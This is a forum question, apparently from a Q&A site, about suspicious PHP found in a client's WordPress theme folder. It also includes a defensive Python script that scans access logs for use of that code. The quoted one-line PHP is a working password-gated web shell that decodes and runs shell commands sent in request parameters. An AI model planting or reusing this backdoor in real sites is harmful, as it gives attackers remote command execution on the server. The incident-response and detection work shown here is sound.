
A client asked me to take a look at some "malicious code" that his security plugin (Wordfence) alerted him to. It was found in the /wp-content/themes folder.

When searching parts of the PHP code, I am getting suspicious results with GitHub repos and things labeled "hacker" and links in Russian and whatnot. I don't have too much doubt that it is malicious, but I don't know where to go from here beyond deleting the file.

$s=explode(":","99ca5f8858b3bd43cf30a4e7dc9417e8b8b53822:year:_cat");$q=$_REQUEST;if (sha1(md5($q[$s[1]]))===$s[0]){if (isset($q[$s[2]])){$l=base64_decode($q[$s[2]]);echo `$l`;}}
antifolio
  • 9
  • 1
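Added example, not part of the original post: the snippet above checks the request parameter `year` against a stored hash and, when it matches, base64-decodes the parameter `_cat` and runs it through PHP's backtick (shell) operator, so one follow-up step beyond deleting the file is to check the web server access log for requests that carried both parameters. The Python below assumes Combined Log Format; the sample log lines, IP addresses, and file path are constructed placeholders.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names taken from the snippet in the question:
# "year" carries the password, "_cat" the base64-encoded command.
PASS_PARAM, CMD_PARAM = "year", "_cat"

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_command(value):
    """Return the decoded command text, or None if value is not valid base64."""
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")

def find_backdoor_hits(lines):
    """Return one dict per logged request whose query has both parameters."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        query = parse_qs(url.query, keep_blank_values=True)
        if PASS_PARAM in query and CMD_PARAM in query:
            hits.append({"ip": m["ip"], "time": m["time"], "path": url.path,
                         "status": m["status"],
                         "command": decode_command(query[CMD_PARAM][0])})
    return hits

# Constructed sample lines (not from the page); path and values are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/themes/example/x.php?year=placeholder&_cat=aWQ%3D HTTP/1.1" 200 54',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /?year=2023&cat=news HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?_cat=%21%21&year=a HTTP/1.1" 404 12',
]

if __name__ == "__main__":
    for hit in find_backdoor_hits(SAMPLE_LOG):
        print(hit)
```

The snippet reads `$_REQUEST`, which also covers POST bodies (and, depending on PHP configuration, cookies); those do not appear in a standard access log, so an empty result does not show the file was never used.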

0 Answers